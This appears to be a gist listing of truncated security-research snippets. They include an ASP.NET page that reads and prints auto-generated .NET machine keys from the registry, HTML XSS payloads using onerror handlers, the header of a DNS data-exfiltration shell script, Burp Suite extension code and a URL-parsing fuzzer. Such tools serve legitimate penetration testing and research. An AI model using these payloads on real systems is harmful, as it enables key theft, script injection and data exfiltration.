This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Convert from iso-8859-1, utf-8ed to binary! | |
# Useful for file disclosure when encoding can be controlled | |
# The following C# code shows an example (result is iso-8859-1, utf-8ed!): | |
###string encoding = "iso-8859-1"; | |
######string sourceFile = @"Newtonsoft.Json.dll"; | |
###### | |
######public void test() | |
######{ | |
#########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding); | |
#########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<%@ Page Language="C#" %> | |
<% | |
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
Response.Write("<br/><hr/>"); | |
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
if(autoGenKeyV4!=null) | |
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
Response.Write("<br/>"); | |
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
if(autoGenKey!=null) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<img alt="<x" title="/><img src=url404 onerror=xss(0)>"> | |
<img alt=" | |
<x" title="/> | |
<img src=url404 onerror=xss(1)>"> | |
<style><style/><img src=url404 onerror=xss(2)> | |
<xmp><xmp/><img src=url404 onerror=xss(3)> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick but haven't tested it: | |
outer_cmd_template="powershell -enc %CMD_B64%" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick but haven't tested it: | |
outer_cmd_template="powershell -enc %CMD_B64%" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ***********************************************replacer_for_python_scripter | |
import re,random | |
print callbacks.getToolName(toolFlag) | |
if(messageIsRequest): | |
if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"): | |
requestInfo = helpers.analyzeRequest(messageInfo) | |
headers = requestInfo.getHeaders() | |
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] | |
msg = helpers.bytesToString(msgBody) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// by @irsdl | |
boolean manualColorHighlightEnabled = true; // e.g. BurpRed anywhere in the request | |
boolean pwnFoxColorHighlightEnabled = true; // to support PwnFox Firefox extension containers | |
// BEGIN HIGHLIGHT LOGIC { | |
boolean hasAlreadyBeenColoured = false; | |
/* Manual highlight logic to see something like BurpRed */ | |
if(manualColorHighlightEnabled){ | |
Pattern manualHighlightPattern = Pattern.compile("burp([a-z]{3,7}+)", Pattern.CASE_INSENSITIVE); // like burpRed or burpYellow |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// by @irsdl | |
// This script identifies anomalies in how JS parses the URL using `URL(url).hostname`: | |
// 1- Characters that are ignored when present in the domain name. | |
// 2- Characters that can replace ASCII characters in domain names and still be parsed correctly. In here we want letter S in `soroush.me` | |
// You can try running this script in your browser's dev console or at https://www.jdoodle.com/execute-nodejs-online/ | |
// I am sure this must have been looked at before but I cannot find a reference | |
for (let i = 0; i <= 0xFFFF; i++) { | |
const unicodeChar = String.fromCharCode(i); | |
const urlString = `http://sorous${unicodeChar}h.me/blog/`; |